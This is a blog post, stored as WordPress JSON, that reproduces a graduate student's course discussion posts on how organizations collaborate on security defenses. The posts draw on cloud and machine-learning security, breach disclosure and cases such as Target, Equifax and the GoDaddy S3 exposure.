{"id":614,"date":"2018-08-10T00:00:29","date_gmt":"2018-08-10T00:00:29","guid":{"rendered":"http:\/\/bocchinfuso.net\/?p=614"},"modified":"2026-03-20T07:32:10","modified_gmt":"2026-03-20T07:32:10","slug":"fit-mgt5157-week-6","status":"publish","type":"post","link":"http:\/\/bocchinfuso.net\/index.php\/2018\/08\/10\/fit-mgt5157-week-6\/","title":{"rendered":"FIT &#8211; MGT5157 &#8211; Week 6"},"content":{"rendered":"<p>The submissions for this assignment are posts in the assignment&#8217;s discussion. Below are the discussion posts for Richard Bocchinfuso, or you can\u00a0<a id=\"discussion_view_link\" href=\"https:\/\/floridatech.instructure.com\/courses\/473\/discussion_topics\/4749?headless=1&amp;student_id=1302\"><b>view the full discussion<\/b><\/a>.<\/p>\n<div id=\"entry_18764\" class=\"discussion_entry communication_message can_be_marked_as_read read\" data-mark-read-url=\"\/api\/v1\/courses\/473\/discussion_topics\/4749\/entries\/18764\/read\">\n<div class=\"header clearfix\">\n<div class=\"header_title\">from\u00a0<a href=\"https:\/\/floridatech.instructure.com\/courses\/473\/discussion_topics\/4749?headless=1&amp;student_id=1302\">6.3 Discussion<\/a><\/div>\n<div class=\"teaser_message\"><\/div>\n<div class=\"post_date time_ago_date\" title=\"Aug 10, 2018 1:02pm\" data-timestamp=\"2018-08-10T13:02:57-04:00\">Aug 10, 2018 1:02pm<\/div>\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"content\">\n<div><a class=\"avatar \" href=\"https:\/\/floridatech.instructure.com\/courses\/473\/users\/1302\"><span class=\"screenreader-only\">Richard Bocchinfuso<\/span><\/a><\/div>\n<div class=\"message user_content enhanced\">\n<p><em>Discussion: Describe the basis for effective collaboration of security defenses within and between organizations.<\/em><\/p>\n<p>This is an interesting question. 
I think ten years ago effective collaboration of security defenses within and between organizations would have been highly dependent on effective open communication between these organizations. Today I think the effective collaboration of security defenses is being aided by two core technology shifts:<\/p>\n<ol>\n<li>Cloud<\/li>\n<li>Machine Learning, Deep Learning, AI<\/li>\n<\/ol>\n<p>Let&#8217;s start with the cloud. Today&#8217;s security providers are increasingly becoming cloud-enabled; they rely on the aggregation of massive data sets (big data) for heuristics on massive compute farms that far surpass what is possible in a heuristics engine on a laptop, desktop or mobile device. Just about every security technology provider is leveraging the cloud and the vast resources it provides. When organizations buy into the cloud-based security paradigms it is the equivalent of sharing and communicating information, but this information is now being aggregated, anonymized, analyzed and cross-referenced in real time.\u00a0 (Quora Contributor, 2018)<\/p>\n<p>Machine learning, deep learning, and AI are not just buzzwords; they are technologies that harness data and continuously train models that can begin to see things which are not visible to the naked eye. These technologies are greatly altering how we think about security. 
Security providers like\u00a0<a class=\"external\" href=\"https:\/\/www.alertlogic.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">AlertLogic<\/a>,\u00a0<a class=\"external\" href=\"https:\/\/www.secureworks.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">Secureworks<\/a>\u00a0and many others focus on IPS\/IDS and incident response models that leverage data which is anonymized but aggregated and analyzed across their entire customer base; this has tremendous value. Security providers like\u00a0<a class=\"external\" href=\"https:\/\/www.tanium.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">Tanium<\/a>\u00a0and\u00a0<a class=\"external\" href=\"https:\/\/www.pandasecurity.com\/usa\/\" target=\"_blank\" rel=\"noreferrer noopener\">Panda Security<\/a>\u00a0and others who focus on end-point security also use cloud technologies, big data and machine learning to provide superior heuristics. 
For example, the embedded anti-malware in Windows 10 makes use of &#8220;cloud-based protection&#8221; to better protect users; users are opted in to collaborating, and opting out requires user intervention that is buried in the bowels of the operating system and anti-malware (Windows Defender) configuration settings.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/www.winhelponline.com\/blog\/wp-content\/uploads\/2017\/01\/defender-policies-1.png?fit=760%2C658&amp;quality=100&amp;ssl=1\" \/><\/p>\n<p>Collaboration and engagement require a focus on Human-Computer Interaction (HCI) to drive system usability and adoption; this is especially true in the field of security. Users vary and they have different expectations of the systems they interact with; a simple blacklist or whitelist approach no longer gets the job done, as these approaches slow productivity and encourage working around the system. (Coursera, 2018)<\/p>\n<p>Intelligent security systems which leverage AI may be able to adapt security protocols based on user usage profiles. For example, which users took the lollipop and which users didn&#8217;t, and should how security is enforced for these two user types differ? (DreamHost, 2018)<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/pbQm-nIMo_A\" width=\"560\" height=\"314\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><\/iframe><\/p>\n<p>To close out my thoughts this week, I will end with an example of a security problem that is not a platform problem, but rather a use problem, as is often the case. 
For those of us who have used Amazon (AWS) S3, the AWS object storage service, we know that AWS offers extremely fine-grained ACLs for S3 buckets; the security paradigm is quite robust and defaults to no access, but this robustness and fine-grained programmatic and composable infrastructure comes with complexity (Amazon, 2018). Complexity leads to usability challenges, which lead us to exposing data which is not intended to be exposed. This week that victim was GoDaddy, who exposed an S3 bucket containing configuration data for tens of thousands of systems, as well as sensitive pricing information, apropos given our collective conversations last week regarding GoDaddy and DNS registrars.\u00a0 (Chickowski, 2018)<\/p>\n<p>With &gt; 80% of all corporations experiencing a hack of some sort, exploitation is on the rise and there is no end in sight. (Lipka, 2015) As we continue towards a public cloud world, platforms are providing more choice, easier access, and the ability to be more agile, build faster and come to market faster, but we&#8217;ve lost the simplistic nature of layer 1 security. We have to have security systems that live at a layer above layer 1 human interaction and communication. I believe that progress will depend on the ability of the security systems of today and tomorrow to facilitate zero-touch collaboration in an automated and secure way.<\/p>\n<p><strong>References<\/strong><\/p>\n<p>Amazon. (2018, August 10). Bucket Policy Examples. Retrieved August 10, 2018, from https:\/\/docs.aws.amazon.com\/AmazonS3\/latest\/dev\/example-bucket-policies.html<\/p>\n<p>Chickowski, E. (2018, August 9). AWS Employee Flub Exposes S3 Bucket Containing GoDaddy Server Configuration and Pricing Models. Retrieved August 10, 2018, from https:\/\/www.darkreading.com\/attacks-breaches\/aws-employee-flub-exposes-s3-bucket-containing-godaddy-server-configuration-and-pricing-models\/d\/d-id\/1332525<\/p>\n<p>Coursera. (2018, August 10). Usable Security. 
Retrieved August 10, 2018, from https:\/\/www.coursera.org\/lecture\/usable-security\/course-intro-60olh<\/p>\n<p>DreamHost. (2018, January 30). Take This Lollipop&#8230; I Dare You! Retrieved August 10, 2018, from https:\/\/www.dreamhost.com\/blog\/take-this-lollipop-i-dare-you\/<\/p>\n<p>ElsonCabral. (2011, October 26). Take This Lollipop. Retrieved August 10, 2018, from https:\/\/www.youtube.com\/watch?v=pbQm-nIMo_A<\/p>\n<p>Lipka, M. (2015, June 05). Percentage of companies that report systems hacked. Retrieved August 10, 2018, from https:\/\/www.cbsnews.com\/news\/percentage-of-companies-that-report-systems-hacked\/<\/p>\n<p>Quora Contributor. (2018, February 15). How Will Artificial Intelligence And Machine Learning Impact Cyber Security? Retrieved August 10, 2018, from https:\/\/www.forbes.com\/sites\/quora\/2018\/02\/15\/how-will-artificial-intelligence-and-machine-learning-impact-cyber-security\/#34f878166147<\/p>\n<\/div>\n<div class=\"link_box\">\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"subcontent\"><\/div>\n<\/div>\n<\/div>\n<div id=\"entry_18851\" class=\"discussion_entry communication_message can_be_marked_as_read read\" data-mark-read-url=\"\/api\/v1\/courses\/473\/discussion_topics\/4749\/entries\/18851\/read\">\n<div class=\"header clearfix\">\n<div class=\"header_title\">from\u00a0<a href=\"https:\/\/floridatech.instructure.com\/courses\/473\/discussion_topics\/4749?headless=1&amp;student_id=1302\">6.3 Discussion<\/a><\/div>\n<div class=\"teaser_message\"><\/div>\n<div class=\"post_date time_ago_date\" title=\"Aug 10, 2018 6:41pm\" data-timestamp=\"2018-08-10T18:41:35-04:00\">Aug 10, 2018 6:41pm<\/div>\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"content\">\n<div><a class=\"avatar \" href=\"https:\/\/floridatech.instructure.com\/courses\/473\/users\/1302\"><span class=\"screenreader-only\">Richard Bocchinfuso<\/span><\/a><\/div>\n<div class=\"message user_content enhanced\">\n<p>James, I would go as far as to say unless 
mandated by a regulatory requirement, very few enterprises are advertising breaches, and even when mandated by regulatory bodies they are pushing the boundaries\u00a0of the disclosure.\u00a0 For example,\u00a0Equifax took six weeks to disclose the hack, and it is not the only major enterprise in a regulated industry looking to delay disclosure.\u00a0 The bigger the organization and the more sensitive\u00a0the data, the tighter and more broad-sweeping the NDAs.\u00a0 Ed Snowdens are not falling out of trees, and the number of statistical breaches, when contrasted with the number of reported breaches,\u00a0says there is more interest in obfuscation than there is in disclosure.\u00a0 Sure, the OTR conversations can happen at an InfoSec meetup, but the bigger the enterprise the more isolated and focused exposure is becoming, with access to systems, processes, conversations, etc. becoming so tightly governed that it&#8217;s getting harder and harder to assemble a full picture of a situation. Those who do have the complete picture don&#8217;t attend InfoSec meetups; they are busy having dinner\u00a0at Le Bernardin. 
\ud83d\ude42<\/p>\n<p>I think it&#8217;s a fair assumption that we know only a small fraction of what&#8217;s happening and that the preponderance of the most diabolical stuff never makes it into the mainstream.\u00a0 As technology becomes a profit center for every company, we will see more and more of this.\u00a0 The days of &#8220;we are a manufacturing company and tech is a cost center&#8221; are over; big data, analytics, and machine learning are driving every industry, with the CMO\u00a0spending more on technology than the CIO.<\/p>\n<p>Not saying we shouldn&#8217;t\u00a0keep trying, but I believe we will see significant\u00a0innovations that will change the game, relying less on the good behavior\u00a0of people and more on the machine to make and monitor decisions.\u00a0 Andrew mentioned the Target breach; there is no reason that a PLC\u00a0network for HVAC controls should have &gt;= layer 2 access to a network for payment processing (IMO layer 1 is even questionable). What should have been disclosed is the name of the network architect who built that infrastructure and everyone who looked at it thereafter and didn&#8217;t yell from the rooftop.<\/p>\n<p><strong>References<\/strong><\/p>\n<p>Isidore, C. (2017, September 8). Equifax&#8217;s delayed hack disclosure: Did it break the law? Retrieved August 10, 2018, from https:\/\/money.cnn.com\/2017\/09\/08\/technology\/equifax-hack-disclosure\/<\/p>\n<p>McLellan, L. (n.d.). By 2017 the CMO will Spend More on IT Than the CIO. 
Retrieved August 10, 2018, from https:\/\/www.gartner.com\/webinar\/1871515<\/p>\n<p>&nbsp;<\/p>\n<\/div>\n<div class=\"link_box\">\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"subcontent\"><\/div>\n<\/div>\n<\/div>\n<div id=\"entry_18858\" class=\"discussion_entry communication_message can_be_marked_as_read read\" data-mark-read-url=\"\/api\/v1\/courses\/473\/discussion_topics\/4749\/entries\/18858\/read\">\n<div class=\"header clearfix\">\n<div class=\"header_title\">from\u00a0<a href=\"https:\/\/floridatech.instructure.com\/courses\/473\/discussion_topics\/4749?headless=1&amp;student_id=1302\">6.3 Discussion<\/a><\/div>\n<div class=\"teaser_message\"><\/div>\n<div class=\"post_date time_ago_date\" title=\"Aug 10, 2018 7:07pm\" data-timestamp=\"2018-08-10T19:07:13-04:00\">Aug 10, 2018 7:07pm<\/div>\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"content\">\n<div><a class=\"avatar \" href=\"https:\/\/floridatech.instructure.com\/courses\/473\/users\/1302\"><span class=\"screenreader-only\">Richard Bocchinfuso<\/span><\/a><\/div>\n<div class=\"message user_content enhanced\">\n<p>Andrew, let&#8217;s assume that an organization\u00a0or organizations have a well designed and implemented network infrastructure using platforms from providers like Cisco, Juniper, Palo Alto, etc.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.cisco.com\/c\/dam\/en\/us\/td\/i\/200001-300000\/290001-300000\/295001-296000\/295151.tif\/_jcr_content\/renditions\/295151.jpg\" alt=\"Image result for good private spine leaf design principles\" \/><\/p>\n<p>Organizations acting together (e.g. 
supplier and buyers in a supply chain system) can secure\u00a0their\u00a0data exchange on encrypted channels, they can use multi-factor authentication,\u00a0they can use Geo-fencing, they can use certificate-based PKI Smart Cards, but what if the exploit resides in the router or firewall code?\u00a0 What if there is an APT (Advanced Persistent Threat) against organization X which exploits some vulnerability in the router or firewall code?\u00a0 When organization\u00a0X identifies the breach, do they communicate that they have been breached?\u00a0 If so, to whom?\u00a0 While agreeing that open communication is key to slowing the bad guys, reducing the blast radius, etc., I also believe there are few organizations willing to volunteer that they have been breached; this is especially true if the breach has to do with human error, as they so often do.\u00a0 The reports we see are typically driven by watchdog groups, like the recent\u00a0<a class=\"external\" href=\"https:\/\/www.zdnet.com\/article\/aws-error-exposed-godaddy-server-secrets\/\" target=\"_blank\" rel=\"noreferrer noopener\">GoDaddy breach<\/a>; by a regulatory requirement to disclose, like the\u00a0<a class=\"external\" href=\"https:\/\/krebsonsecurity.com\/2014\/02\/target-hackers-broke-in-via-hvac-company\/\" target=\"_blank\" rel=\"noreferrer noopener\">Target<\/a>\u00a0or\u00a0<a class=\"external\" href=\"https:\/\/krebsonsecurity.com\/2017\/09\/equifax-breach-response-turns-dumpster-fire\/\" target=\"_blank\" rel=\"noreferrer noopener\">Equifax<\/a>\u00a0breach; or by a catastrophe, like the\u00a0<a class=\"external\" href=\"https:\/\/www.infoworld.com\/article\/2608076\/data-center\/murder-in-the-amazon-cloud.html\" target=\"_blank\" rel=\"noreferrer noopener\">CodeSpaces<\/a>\u00a0breach, but in most cases the motivation to disclose is not very strong at all.\u00a0 I believe the answer resides in anonymizing\u00a0the breach reports, focusing a little less on corporate accountability and more on getting the data needed to start programmatically\u00a0plugging the gaps, making the system less punitive\u00a0and mandating more tech to secure the network so the machine may save us from ourselves.\u00a0 In essence, more carrot and less stick.\u00a0 For example, what if in the case of Target there was stateful packet inspection which saw both PLC data and payment processing data flowing on the same network, and took automated action to segment the traffic, shut the traffic down, etc.?\u00a0 Sure, these technologies will get hacked as well, but people are inherently poor binary decision makers and I think we will see a different paradigm emerge.\u00a0 I think we are seeing it already.<\/p>\n<\/div>\n<div class=\"link_box\">\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"subcontent\"><\/div>\n<\/div>\n<\/div>\n<div id=\"entry_18868\" class=\"discussion_entry communication_message can_be_marked_as_read read\" data-mark-read-url=\"\/api\/v1\/courses\/473\/discussion_topics\/4749\/entries\/18868\/read\">\n<div 
class=\"header clearfix\">\n<div class=\"header_title\">from\u00a0<a href=\"https:\/\/floridatech.instructure.com\/courses\/473\/discussion_topics\/4749?headless=1&amp;student_id=1302\">6.3 Discussion<\/a><\/div>\n<div class=\"teaser_message\"><\/div>\n<div class=\"post_date time_ago_date\" title=\"Aug 10, 2018 8:13pm\" data-timestamp=\"2018-08-10T20:13:50-04:00\">Aug 10, 2018 8:13pm<\/div>\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"content\">\n<div><a class=\"avatar \" href=\"https:\/\/floridatech.instructure.com\/courses\/473\/users\/1302\"><span class=\"screenreader-only\">Richard Bocchinfuso<\/span><\/a><\/div>\n<div class=\"message user_content enhanced\">\n<p>Scott, enjoyed the post.\u00a0 I think this is my first comment on one of your posts in this class.\u00a0 I like Canvas 1000x better than the old LMS, but it feels like this class has more students or something because the discussion threads are long.\u00a0 Anyway, I have a few friends who work for FireEye; they are 100% focused on APTs (Advanced Persistent Threats) and what they will say is that FireEye focuses on four things:\u00a0<em>Prevent, Detect, Contain, Resolve.<\/em>\u00a0While prevention and detection are important, with APTs the bad guys will typically find a way in, so they put a heavy focus on containment.\u00a0 What containment is about is not letting the bad guys leave once they are in.\u00a0 I always\u00a0think about the bar scene\u00a0from the movie &#8220;A Bronx Tale&#8221;.\u00a0 The bad guys walk into the bar, but then they are contained. 
\ud83d\ude42<\/p>\n<p>Starting to see more and more focus on preventing data exfiltration (DLP).<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"clear\"><\/div>\n<h3>Assignment<\/h3>\n<div>[google-drive-embed url=&#8221;https:\/\/docs.google.com\/document\/d\/1BvA-CaYSKm7rdegCd7t-gD-UUwki15mbCroNSoZRhwo\/preview?usp=drivesdk&#8221; title=&#8221;Bocchinfuso &#8211; FIT &#8211; MGT5157 &#8211; Week 6 &#8211; Assignment 5&#8243; icon=&#8221;https:\/\/drive-thirdparty.googleusercontent.com\/16\/type\/application\/vnd.google-apps.document&#8221; width=&#8221;100%&#8221; height=&#8221;400&#8243; style=&#8221;embed&#8221;]<\/div>\n","protected":false},"excerpt":{"rendered":"<p>The submissions for this assignment are posts in the assignment&#8217;s discussion. Below are the discussion posts for Richard Bocchinfuso, or you can\u00a0view the full discussion. from\u00a06.3 Discussion Aug 10, 2018 1:02pm Richard Bocchinfuso Discussion: Describe the basis for effective collaboration of security defenses within and between organizations. This is an interesting question. 
I think ten [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":37,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,13,2],"tags":[],"_links":{"self":[{"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/posts\/614"}],"collection":[{"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/comments?post=614"}],"version-history":[{"count":3,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/posts\/614\/revisions"}],"predecessor-version":[{"id":756,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/posts\/614\/revisions\/756"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/media\/37"}],"wp:attachment":[{"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/media?parent=614"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/categories?post=614"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/tags?post=614"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}